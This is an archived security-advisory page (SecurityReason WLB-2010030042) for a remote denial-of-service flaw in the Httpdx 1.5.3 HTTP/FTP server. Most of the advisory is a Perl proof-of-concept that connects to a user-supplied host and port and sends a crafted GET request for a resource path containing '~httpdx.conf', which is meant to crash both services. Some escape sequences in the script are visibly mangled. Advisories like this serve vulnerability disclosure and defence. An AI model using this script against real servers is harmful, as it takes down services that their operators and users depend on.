SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

Httpdx 1.5.3 remote break services


Arrow  WLB : WLB-2010030042  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-03-11
Arrow  Credit          : Jonathan Salwan
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History : [2010-03-11] Started

Arrow  Affected software :  Httpdx version 1.5.3



Arrow  Text :  

#!/usr/bin/perl
#
# Program : Httpdx v1.5.3
# PoC : Remote Break Services
# Homepage : http://sourceforge.net/projects/httpdx/
# Found by : Jonathan Salwan
# This Advisory : Jonathan Salwan
# Contact : submit@shell-storm.org
#
#
# //----- Application description
#
# Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs
# with only few threads. Includes directory listing, virtual hosting, basic
auth., support
# for PHP, Perl, Python, SSI, etc. All settings in one config/script file.

#
#
# //----- Description of vulnerability
#
# The vulnerability is caused due to an input validation error when
processing HTTP requests. This can be
# exploited to break all services http & ftp.
#
#
#
# //----- Credits
#
# http://www.shell-storm.org <submit@shell-storm.org>
#
#


use IO::Socket;
print "n[x]Httpdx v1.5.3 - Remote Break Servicesn";

if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host>
<port>n";
print "[-] Exemple: file.pl 127.0.0.1 80n";
exit;
}

$ip = $ARGV[0];
$port = $ARGV[1];


$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$ip", PeerPort => "$port") || die "[-]
Connecting: Failed!n";

print "[+] Sending request: GET /res~httpdx.conf/image/php.png
HTTP/1.1\r\nHost: $ip\r\n\r\n";
$msg = "GET /res~httpdx.conf/image/php.png HTTP/1.1rnHost:
$iprnrn";
$socket->send($msg);

print "n[+] Done.nn";

close($socket);


Audyt bezpieczeństwa

Security Audit

Analiza powłamaniowa

Arrow  References :  

None

If you want change this note, please use UCP



Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

Copyright © SecurityReason.com. All Rights Reserved.